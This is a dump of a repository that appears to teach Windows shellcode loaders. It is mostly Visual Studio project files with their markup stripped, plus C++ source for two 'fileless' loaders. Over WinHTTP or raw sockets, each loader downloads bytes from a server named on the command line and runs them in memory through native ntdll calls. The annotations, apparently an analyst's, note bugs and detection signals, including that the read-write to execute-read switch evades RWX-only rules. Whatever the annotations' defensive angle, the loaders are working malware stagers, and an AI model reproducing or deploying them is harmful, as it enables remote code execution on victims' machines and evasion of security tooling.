102 | printf("[!] Failed in sysNtWaitForSingleObject (%u)\n", GetLastError());
103 | return;
104 | }
105 | }
106 |
// getShellcode_Run: issues one HTTP GET through WinHTTP and passes each chunk
// of the response body to RunShellcode.
//
// Parameters:
//   whost     - server name handed to WinHttpConnect.
//   port      - server port handed to WinHttpConnect.
//   wresource - object name handed to WinHttpOpenRequest.
//
// Network indicators visible in this function: the fixed User-Agent
// "WinHTTP Example/1.0", and a request opened with flags NULL, i.e. without
// WINHTTP_FLAG_SECURE, so the transfer is plain HTTP. The response is used as
// received; nothing here checks its length, type or integrity.
107 | void getShellcode_Run(wchar_t* whost, DWORD port, wchar_t* wresource) {
108 | DWORD dwSize = 0;
109 | DWORD dwDownloaded = 0;
110 | LPSTR pszOutBuffer = NULL;
111 | BOOL bResults = FALSE;
112 | HINTERNET hSession = NULL,
113 | hConnect = NULL,
114 | hRequest = NULL;
115 | // Use WinHttpOpen to obtain a session handle.
116 | hSession = WinHttpOpen(L"WinHTTP Example/1.0",
117 | WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
118 | WINHTTP_NO_PROXY_NAME,
119 | WINHTTP_NO_PROXY_BYPASS, 0);
120 |
121 |
// Each `else` below runs when the PREVIOUS call failed, so the function named
// in its message is one step later than the call that actually failed (this
// first one fires when WinHttpOpen returned NULL).
122 | // Specify an HTTP server.
123 | if (hSession)
124 | hConnect = WinHttpConnect(hSession, whost,
125 | port, 0);
126 | else
127 | printf("Failed in WinHttpConnect (%u)\n", GetLastError());
128 |
129 | // Create an HTTP request handle.
130 | if (hConnect)
131 | hRequest = WinHttpOpenRequest(hConnect, L"GET", wresource,
132 | NULL, WINHTTP_NO_REFERER,
133 | WINHTTP_DEFAULT_ACCEPT_TYPES,
134 | NULL);
135 | else
136 | printf("Failed in WinHttpOpenRequest (%u)\n", GetLastError());
137 |
138 | // Send a request.
139 | if (hRequest)
140 | bResults = WinHttpSendRequest(hRequest,
141 | WINHTTP_NO_ADDITIONAL_HEADERS,
142 | 0, WINHTTP_NO_REQUEST_DATA, 0,
143 | 0, 0);
144 | else
145 | printf("Failed in WinHttpSendRequest (%u)\n", GetLastError());
146 |
147 | // End the request.
148 | if (bResults)
149 | bResults = WinHttpReceiveResponse(hRequest, NULL);
150 | else printf("Failed in WinHttpReceiveResponse (%u)\n", GetLastError());
151 |
// The do/while is the body of this `if`. Each pass handles one chunk: the
// chunks are not joined, so every pass that reads successfully leads to a
// separate RunShellcode call (one allocation and one thread per chunk).
152 | // Keep checking for data until there is nothing left.
153 | if (bResults)
154 | do
155 | {
156 | // Check for available data.
157 | dwSize = 0;
// The format string has two %u conversions but only one argument is supplied.
158 | if (!WinHttpQueryDataAvailable(hRequest, &dwSize))
159 | printf("Error %u in WinHttpQueryDataAvailable (%u)\n", GetLastError());
160 |
// The buffer allocated here is never deleted. Plain `new` reports failure by
// throwing by default, so the null check below is not expected to trigger.
161 | // Allocate space for the buffer.
162 | pszOutBuffer = new char[dwSize + 1];
163 | if (!pszOutBuffer)
164 | {
165 | printf("Out of memory\n");
166 | dwSize = 0;
167 | }
168 | else
169 | {
170 | // Read the Data.
171 | ZeroMemory(pszOutBuffer, dwSize + 1);
172 |
173 | if (!WinHttpReadData(hRequest, (LPVOID)pszOutBuffer,
174 | dwSize, &dwDownloaded))
175 | printf("Error %u in WinHttpReadData.\n", GetLastError());
176 | else {
177 |
// The length passed is dwSize + 1 (the zeroed byte included), not dwDownloaded.
178 | // Run the shellcode
179 | RunShellcode(pszOutBuffer, dwSize + 1);
180 |
181 | }
182 |
183 | }
184 |
185 | } while (dwSize > 0);
186 |
187 |
188 |
189 | // Report any errors.
190 | if (!bResults)
191 | printf("Error %d has occurred.\n", GetLastError());
192 |
193 | // Close any open handles.
194 | if (hRequest) WinHttpCloseHandle(hRequest);
195 | if (hConnect) WinHttpCloseHandle(hConnect);
196 | if (hSession) WinHttpCloseHandle(hSession);
197 |
198 | }
199 |
200 |
// Entry point. Expects exactly three command-line arguments, read below as
// host, port and resource, converts host and resource to wide strings and
// calls getShellcode_Run. Returns 1 on a wrong argument count, otherwise 0.
// For triage, the process command line therefore carries the server name,
// port and path the program contacts.
201 | int main(int argc, char** argv) {
202 |
// The usage text as shown here prints only the program name.
203 | // Validate the parameters
204 | if (argc != 4) {
205 | printf("[+] Usage: %s \n", argv[0]);
206 | return 1;
207 | }
208 | char* host = argv[1];
// atoi result is used as the port without any range or error check.
209 | DWORD port = atoi(argv[2]);
210 | char* resource = argv[3];
211 |
// Both wide-string buffers are sized from strlen() + 1 and are never deleted.
212 | const size_t cSize1 = strlen(host) + 1;
213 | wchar_t* whost = new wchar_t[cSize1];
214 | mbstowcs(whost, host, cSize1);
215 |
216 |
217 | const size_t cSize2 = strlen(resource) + 1;
218 | wchar_t* wresource = new wchar_t[cSize2];
219 | mbstowcs(wresource, resource, cSize2);
220 |
221 | getShellcode_Run(whost, port, wresource);
222 |
223 | return 0;
224 |
225 | }
--------------------------------------------------------------------------------
/4 - Fileless Shellcode/1 - Using Sockets/FilelessShellcode.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 |
6 | #pragma comment(lib, "ntdll")
7 |
8 | #pragma comment (lib, "Ws2_32.lib")
9 | #pragma comment (lib, "Mswsock.lib")
10 | #pragma comment (lib, "AdvApi32.lib")
11 |
12 |
13 | #define NtCurrentProcess() ((HANDLE)-1)
14 | #define DEFAULT_BUFLEN 4096
15 |
16 | #ifndef NT_SUCCESS
17 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
18 | #endif
19 |
// Hand-written prototypes for four native calls used by RunShellcode below.
// They are resolved at link time through `#pragma comment(lib, "ntdll")` at the
// top of this file, so the built binary presumably lists these names as
// imports from ntdll.dll - a static triage signal worth confirming on a sample.

// Allocates (reserves/commits) a region in the process given by ProcessHandle.
20 | EXTERN_C NTSTATUS NtAllocateVirtualMemory(
21 | HANDLE ProcessHandle,
22 | PVOID* BaseAddress,
23 | ULONG_PTR ZeroBits,
24 | PSIZE_T RegionSize,
25 | ULONG AllocationType,
26 | ULONG Protect
27 | );
28 |
// Changes the page protection of a region; the previous value is returned
// through OldProtect.
29 | EXTERN_C NTSTATUS NtProtectVirtualMemory(
30 | IN HANDLE ProcessHandle,
31 | IN OUT PVOID* BaseAddress,
32 | IN OUT PSIZE_T RegionSize,
33 | IN ULONG NewProtect,
34 | OUT PULONG OldProtect);
35 |
// Creates a thread in ProcessHandle starting at lpStartAddress. This call is
// not part of the documented Win32 API; the parameter list is the author's.
36 | EXTERN_C NTSTATUS NtCreateThreadEx(
37 | OUT PHANDLE hThread,
38 | IN ACCESS_MASK DesiredAccess,
39 | IN PVOID ObjectAttributes,
40 | IN HANDLE ProcessHandle,
41 | IN PVOID lpStartAddress,
42 | IN PVOID lpParameter,
43 | IN ULONG Flags,
44 | IN SIZE_T StackZeroBits,
45 | IN SIZE_T SizeOfStackCommit,
46 | IN SIZE_T SizeOfStackReserve,
47 | OUT PVOID lpBytesBuffer
48 | );
49 |
// Waits on Handle; a negative Timeout is a relative interval in 100 ns units.
50 | EXTERN_C NTSTATUS NtWaitForSingleObject(
51 | IN HANDLE Handle,
52 | IN BOOLEAN Alertable,
53 | IN PLARGE_INTEGER Timeout
54 | );
55 |
// RunShellcode: copies `shellcodeLen` bytes from `shellcode` into a newly
// allocated region of the current process (NtCurrentProcess() is (HANDLE)-1,
// defined above), switches the region to PAGE_EXECUTE_READ and starts a thread
// at its base address.
//
// Parameters:
//   shellcode    - buffer holding the bytes to copy.
//   shellcodeLen - number of bytes copied; it is not compared with the region
//                  size requested below (0x2000 bytes).
// Returns nothing; failure paths return early and nothing is released.
//
// Analyst note: the region goes PAGE_READWRITE -> write -> PAGE_EXECUTE_READ
// and is never writable and executable at once, so rules keyed only on RWX
// pages do not match. The protection change on private memory and a thread
// start address outside any loaded image remain observable.
56 | void RunShellcode(char* shellcode, DWORD shellcodeLen) {
57 |
58 | PVOID BaseAddress = NULL;
59 | SIZE_T dwSize = 0x2000;
60 |
// Terminator and STATUS are declared but never used in this function.
61 | PCSTR Terminator = NULL;
62 | NTSTATUS STATUS;
63 |
// Commit and reserve the region as read/write.
64 | NTSTATUS status1 = NtAllocateVirtualMemory(NtCurrentProcess(), &BaseAddress, 0, &dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
65 | if (!NT_SUCCESS(status1)) {
66 | return ;
67 | }
68 |
69 | RtlMoveMemory(BaseAddress, shellcode, shellcodeLen);
70 |
// hThread is declared but never used; the thread handle lives in hHostThread.
71 | HANDLE hThread;
72 | DWORD OldProtect = 0;
73 |
// Drop write access and add execute access on the same region.
74 | NTSTATUS NtProtectStatus1 = NtProtectVirtualMemory(NtCurrentProcess(), &BaseAddress, (PSIZE_T)&dwSize, PAGE_EXECUTE_READ, &OldProtect);
75 | if (!NT_SUCCESS(NtProtectStatus1)) {
76 | return ;
77 | }
78 |
79 |
80 | HANDLE hHostThread = INVALID_HANDLE_VALUE;
81 |
82 |
// New thread in the current process, start address = BaseAddress, requested
// access mask 0x1FFFFF. On failure the message prints GetLastError(), which is
// the Win32 last-error value and not the NTSTATUS this call returned.
83 | NTSTATUS NtCreateThreadstatus = NtCreateThreadEx(&hHostThread, 0x1FFFFF, NULL, NtCurrentProcess(), (LPTHREAD_START_ROUTINE)BaseAddress, NULL, FALSE, NULL, NULL, NULL, NULL);
84 | if (!NT_SUCCESS(NtCreateThreadstatus)) {
85 | printf("[!] Failed in sysNtCreateThreadEx (%u)\n", GetLastError());
86 | return ;
87 | }
88 |
// -10000000 in 100 ns units is a relative wait of one second.
89 | LARGE_INTEGER Timeout;
90 | Timeout.QuadPart = -10000000;
91 |
92 |
// The wait is bounded: the function returns after at most one second whether
// or not the thread has finished.
93 | NTSTATUS NTWFSOstatus = NtWaitForSingleObject(hHostThread, FALSE, &Timeout);
94 | if (!NT_SUCCESS(NTWFSOstatus)) {
95 | printf("[!] Failed in sysNtWaitForSingleObject (%u)\n", GetLastError());
96 | return ;
97 | }
98 | }
99 |
100 |
// getShellcode_Run: opens a TCP connection to host:port with Winsock, sends a
// bare "GET /<resource>" string, then passes the receive buffer to
// RunShellcode after every recv() call.
//
// Parameters:
//   host     - name or address given to getaddrinfo.
//   port     - service/port string given to getaddrinfo.
//   resource - text appended after "GET /" in the outgoing buffer.
//
// Network indicator visible in this function: the whole client payload is the
// text "GET /" followed by the resource, with no HTTP version, no headers and
// no line terminator, after which the send side is shut down. Received bytes
// are used as they arrive; nothing here checks their length or integrity.
101 | void getShellcode_Run(char* host, char* port, char* resource) {
102 |
// oldp and returnValue are declared but never used.
103 | DWORD oldp = 0;
104 | BOOL returnValue;
105 |
// Whost is filled here and never read afterwards. The size argument passed to
// mbstowcs_s is origsize (strlen(host) + 1), not the 100-element capacity of
// Whost, so the call itself does not bound the write to the array.
106 | size_t origsize = strlen(host) + 1;
107 | const size_t newsize = 100;
108 | size_t convertedChars = 0;
109 | wchar_t Whost[newsize];
110 | mbstowcs_s(&convertedChars, Whost, origsize, host, _TRUNCATE);
111 |
112 |
113 | WSADATA wsaData;
114 | SOCKET ConnectSocket = INVALID_SOCKET;
115 | struct addrinfo* result = NULL,
116 | * ptr = NULL,
117 | hints;
// sendbuf holds MAX_PATH bytes; lstrcatA appends without a length limit.
118 | char sendbuf[MAX_PATH] = "";
119 | lstrcatA(sendbuf, "GET /");
120 | lstrcatA(sendbuf, resource);
121 |
122 | char recvbuf[DEFAULT_BUFLEN];
123 | memset(recvbuf, 0, DEFAULT_BUFLEN);
124 | int iResult;
125 | int recvbuflen = DEFAULT_BUFLEN;
126 |
127 |
128 | // Initialize Winsock
129 | iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
130 | if (iResult != 0) {
131 | printf("WSAStartup failed with error: %d\n", iResult);
132 | return ;
133 | }
134 |
// IPv4, TCP stream sockets only.
135 | ZeroMemory(&hints, sizeof(hints));
136 | hints.ai_family = PF_INET;
137 | hints.ai_socktype = SOCK_STREAM;
138 | hints.ai_protocol = IPPROTO_TCP;
139 |
140 | // Resolve the server address and port
141 | iResult = getaddrinfo(host, port, &hints, &result);
142 | if (iResult != 0) {
143 | printf("getaddrinfo failed with error: %d\n", iResult);
144 | WSACleanup();
145 | return ;
146 | }
147 |
148 | // Attempt to connect to an address until one succeeds
149 | for (ptr = result; ptr != NULL; ptr = ptr->ai_next) {
150 |
// This early return does not call freeaddrinfo(result).
151 | // Create a SOCKET for connecting to server
152 | ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype,
153 | ptr->ai_protocol);
154 | if (ConnectSocket == INVALID_SOCKET) {
155 | printf("socket failed with error: %ld\n", WSAGetLastError());
156 | WSACleanup();
157 | return ;
158 | }
159 |
160 | // Connect to server.
161 | printf("[+] Connect to %s:%s", host, port);
162 | iResult = connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen);
163 | if (iResult == SOCKET_ERROR) {
164 | closesocket(ConnectSocket);
165 | ConnectSocket = INVALID_SOCKET;
166 | continue;
167 | }
168 | break;
169 | }
170 |
171 | freeaddrinfo(result);
172 |
173 | if (ConnectSocket == INVALID_SOCKET) {
174 | printf("Unable to connect to server!\n");
175 | WSACleanup();
176 | return ;
177 | }
178 |
179 | // Send an initial buffer
180 | iResult = send(ConnectSocket, sendbuf, (int)strlen(sendbuf), 0);
181 | if (iResult == SOCKET_ERROR) {
182 | printf("send failed with error: %d\n", WSAGetLastError());
183 | closesocket(ConnectSocket);
184 | WSACleanup();
185 | return ;
186 | }
187 |
188 | printf("\n[+] Sent %ld Bytes\n", iResult);
189 |
190 | // shutdown the connection since no more data will be sent
191 | iResult = shutdown(ConnectSocket, SD_SEND);
192 | if (iResult == SOCKET_ERROR) {
193 | printf("shutdown failed with error: %d\n", WSAGetLastError());
194 | closesocket(ConnectSocket);
195 | WSACleanup();
196 | return ;
197 | }
198 |
// RunShellcode is called on every pass, including the pass where recv()
// returned 0 or an error, and always with the full buffer length
// (recvbuflen = DEFAULT_BUFLEN) rather than the byte count recv() returned.
// Each pass therefore produces its own allocation and thread.
199 | // Receive until the peer closes the connection
200 | do {
201 |
202 | iResult = recv(ConnectSocket, (char*)recvbuf, recvbuflen, 0);
203 | if (iResult > 0)
204 | printf("[+] Received %d Bytes\n", iResult);
205 | else if (iResult == 0)
206 | printf("[+] Connection closed\n");
207 | else
208 | printf("recv failed with error: %d\n", WSAGetLastError());
209 |
210 |
211 | RunShellcode(recvbuf, recvbuflen);
212 |
213 | } while (iResult > 0);
214 |
215 | // cleanup
216 | closesocket(ConnectSocket);
217 | WSACleanup();
218 | }
219 |
220 |
221 |
// Entry point. Expects exactly three command-line arguments and forwards them
// unchanged to getShellcode_Run as host, port and resource. Returns 1 on a
// wrong argument count, otherwise 0. For triage, the process command line
// therefore carries the server, port and path the program contacts.
222 | int main(int argc, char** argv) {
223 |
// The usage text as shown here prints only the program name.
224 | // Validate the parameters
225 | if (argc != 4) {
226 | printf("[+] Usage: %s \n", argv[0]);
227 | return 1;
228 | }
229 |
230 | getShellcode_Run(argv[1], argv[2], argv[3]);
231 |
232 | return 0;
233 |
234 | }
235 |
--------------------------------------------------------------------------------
/3 - Encrypting/1 - AES/AES/AES.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {b2ee63ea-095f-40cc-92d8-bac976655636}
25 | AES
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 |
76 |
77 | false
78 |
79 |
80 | true
81 |
82 |
83 | false
84 |
85 |
86 |
87 | Level3
88 | true
89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
90 | true
91 |
92 |
93 | Console
94 | true
95 |
96 |
97 |
98 |
99 | Level3
100 | true
101 | true
102 | true
103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
104 | true
105 |
106 |
107 | Console
108 | true
109 | true
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
118 | true
119 |
120 |
121 | Console
122 | true
123 |
124 |
125 |
126 |
127 | Level3
128 | true
129 | true
130 | true
131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
132 | true
133 |
134 |
135 | Console
136 | true
137 | true
138 | true
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
--------------------------------------------------------------------------------
/2 - Encoding/3 - UUID shellcode/UUIDs/UUIDs.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {70527328-dcec-4ba7-9958-b5bc3e48ce99}
25 | UUIDs
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 |
76 |
77 | false
78 |
79 |
80 | true
81 |
82 |
83 | false
84 |
85 |
86 |
87 | Level3
88 | true
89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
90 | true
91 |
92 |
93 | Console
94 | true
95 |
96 |
97 |
98 |
99 | Level3
100 | true
101 | true
102 | true
103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
104 | true
105 |
106 |
107 | Console
108 | true
109 | true
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
118 | true
119 |
120 |
121 | Console
122 | true
123 |
124 |
125 |
126 |
127 | Level3
128 | true
129 | true
130 | true
131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
132 | true
133 |
134 |
135 | Console
136 | true
137 | true
138 | true
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
--------------------------------------------------------------------------------
/2 - Encoding/1 - Base64 Loading/Base64/Base64.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {b651a53c-fae6-482e-a590-ca3b48b7f384}
25 | Base64
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 |
76 |
77 | false
78 |
79 |
80 | true
81 |
82 |
83 | false
84 |
85 |
86 |
87 | Level3
88 | true
89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
90 | true
91 |
92 |
93 | Console
94 | true
95 |
96 |
97 |
98 |
99 | Level3
100 | true
101 | true
102 | true
103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
104 | true
105 |
106 |
107 | Console
108 | true
109 | true
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
118 | true
119 |
120 |
121 | Console
122 | true
123 |
124 |
125 |
126 |
127 | Level3
128 | true
129 | true
130 | true
131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
132 | true
133 |
134 |
135 | Console
136 | true
137 | true
138 | true
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
--------------------------------------------------------------------------------
/1 - Simple Loader/SimpleLoader/SimpleLoader.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {497ca37f-506c-46cd-9b8d-f9bb0da34b95}
25 | SimpleLoader
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 |
76 |
77 | false
78 |
79 |
80 | true
81 |
82 |
83 | false
84 |
85 |
86 |
87 | Level3
88 | true
89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
90 | true
91 |
92 |
93 | Console
94 | true
95 |
96 |
97 |
98 |
99 | Level3
100 | true
101 | true
102 | true
103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
104 | true
105 |
106 |
107 | Console
108 | true
109 | true
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
118 | true
119 |
120 |
121 | Console
122 | true
123 |
124 |
125 |
126 |
127 | Level3
128 | true
129 | true
130 | true
131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
132 | true
133 |
134 |
135 | Console
136 | true
137 | true
138 | true
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
--------------------------------------------------------------------------------
/2 - Encoding/4 - IPv4 shellcode/IPfuscation/IPfuscation.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {11385cc1-54b7-4968-9052-df8bb1961f1e}
25 | IPfuscation
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 |
76 |
77 | false
78 |
79 |
80 | true
81 |
82 |
83 | false
84 |
85 |
86 |
87 | Level3
88 | true
89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
90 | true
91 |
92 |
93 | Console
94 | true
95 |
96 |
97 |
98 |
99 | Level3
100 | true
101 | true
102 | true
103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
104 | true
105 |
106 |
107 | Console
108 | true
109 | true
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
118 | true
119 |
120 |
121 | Console
122 | true
123 |
124 |
125 |
126 |
127 | Level3
128 | true
129 | true
130 | true
131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
132 | true
133 |
134 |
135 | Console
136 | true
137 | true
138 | true
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
--------------------------------------------------------------------------------
/2 - Encoding/5 - MAC shellcode/MACshellcode/MACshellcode.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {e991e6a7-31ea-42e3-a471-90f0090e3afd}
25 | MACshellcode
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 |
76 |
77 | false
78 |
79 |
80 | true
81 |
82 |
83 | false
84 |
85 |
86 |
87 | Level3
88 | true
89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
90 | true
91 |
92 |
93 | Console
94 | true
95 |
96 |
97 |
98 |
99 | Level3
100 | true
101 | true
102 | true
103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
104 | true
105 |
106 |
107 | Console
108 | true
109 | true
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
118 | true
119 |
120 |
121 | Console
122 | true
123 |
124 |
125 |
126 |
127 | Level3
128 | true
129 | true
130 | true
131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
132 | true
133 |
134 |
135 | Console
136 | true
137 | true
138 | true
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
--------------------------------------------------------------------------------
/2 - Encoding/2 - Custom Encoding/CustomEncoding/CustomEncoding.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {847d29ff-8bbc-4068-8be1-d84b1089b3c0}
25 | CustomEncoding
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 |
76 |
77 | false
78 |
79 |
80 | true
81 |
82 |
83 | false
84 |
85 |
86 |
87 | Level3
88 | true
89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
90 | true
91 |
92 |
93 | Console
94 | true
95 |
96 |
97 |
98 |
99 | Level3
100 | true
101 | true
102 | true
103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
104 | true
105 |
106 |
107 | Console
108 | true
109 | true
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
118 | true
119 |
120 |
121 | Console
122 | true
123 |
124 |
125 |
126 |
127 | Level3
128 | true
129 | true
130 | true
131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
132 | true
133 |
134 |
135 | Console
136 | true
137 | true
138 | true
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
--------------------------------------------------------------------------------
/4 - Fileless Shellcode/1 - Using Sockets/FilelessShellcode.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {1617117c-0e94-4e6a-922c-836d616ec1f5}
25 | FilelessShellcode
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 |
76 |
77 | false
78 |
79 |
80 | true
81 |
82 |
83 | false
84 |
85 |
86 |
87 | Level3
88 | true
89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
90 | true
91 |
92 |
93 | Console
94 | true
95 |
96 |
97 |
98 |
99 | Level3
100 | true
101 | true
102 | true
103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
104 | true
105 |
106 |
107 | Console
108 | true
109 | true
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
118 | true
119 |
120 |
121 | Console
122 | true
123 |
124 |
125 |
126 |
127 | Level3
128 | true
